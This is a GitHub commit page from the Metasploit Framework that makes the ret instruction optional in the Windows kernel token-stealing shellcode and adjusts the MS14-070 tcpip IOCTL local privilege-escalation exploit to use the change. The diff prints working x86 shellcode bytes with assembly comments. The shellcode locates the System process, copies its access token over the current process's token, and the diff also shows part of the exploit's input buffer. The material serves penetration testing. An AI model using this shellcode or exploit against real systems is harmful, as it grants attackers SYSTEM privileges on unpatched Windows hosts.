Skip to content

Commit 5a39ba3

Browse files
zeroSteinerzeroSteiner
committed
Make the ret instruction for token stealing optional
1 parent dabc163 commit 5a39ba3

File tree

2 files changed

+10
-6
lines changed

2 files changed

+10
-6
lines changed

lib/msf/core/exploit/local/windows_kernel.rb

Lines changed: 9 additions & 5 deletions
Original file line numberDiff line numberDiff line change
@@ -116,10 +116,12 @@ def open_device(file_name, desired_access, share_mode, creation_disposition, fla
116116
# original token to so it can be restored later.
117117
# @param arch [String] The architecture to return shellcode for. If this is nil,
118118
# the arch will be guessed from the target and then module information.
119+
# @param append_ret [Boolean] Append a ret instruction for use when being called
120+
# in place of HaliQuerySystemInformation.
119121
# @return [String] The token stealing shellcode.
120122
# @raise [ArgumentError] If the arch is incompatible.
121123
#
122-
def token_stealing_shellcode(target, backup_token = nil, arch = nil)
124+
def token_stealing_shellcode(target, backup_token = nil, arch = nil, append_ret = true)
123125
arch = target.opts['Arch'] if arch.nil? && target && target.opts['Arch']
124126
if arch.nil? && module_info['Arch']
125127
arch = module_info['Arch']
@@ -144,15 +146,17 @@ def token_stealing_shellcode(target, backup_token = nil, arch = nil)
144146
tokenstealing << "\x89\x1d" + [backup_token].pack('V') # mov dword ptr ds:backup_token, ebx # Optionaly write a copy of the token to the address provided
145147
end
146148
tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks
147-
tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
149+
tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00" # sub eax, 88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks
148150
tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP)
149-
tokenstealing << "\x75\xe8" # jne 0000101e ======================
150-
tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
151+
tokenstealing << "\x75\xe8" # jne 0000101e ======================|
152+
tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov edx, dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX
151153
tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX
152154
tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS
153155
tokenstealing << "\x5b" # pop ebx # Restores ebx
154156
tokenstealing << "\x5a" # pop edx # Restores edx
155-
tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel!
157+
if append_ret
158+
tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel!
159+
end
156160
else
157161
# if this is reached the issue most likely exists in the exploit module
158162
print_error('Unsupported arch for token stealing shellcode')

modules/exploits/windows/local/ms14_070_tcpip_ioctl.rb

Lines changed: 1 addition & 1 deletion
Original file line numberDiff line numberDiff line change
@@ -114,7 +114,7 @@ def exploit
114114

115115
buf = "\x00\x04\x00\x00\x00\x00\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x22\x00\x00\x00\x04\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00"
116116

117-
sc = token_stealing_shellcode(target)[0..-3]
117+
sc = token_stealing_shellcode(target, nil, nil, false)
118118
# move up the stack frames looking for nt!KiSystemServicePostCall
119119
sc << "\x31\xc9" # xor ecx, ecx
120120
sc << "\x89\xeb" # mov ebx, ebp

0 commit comments

Comments
 (0)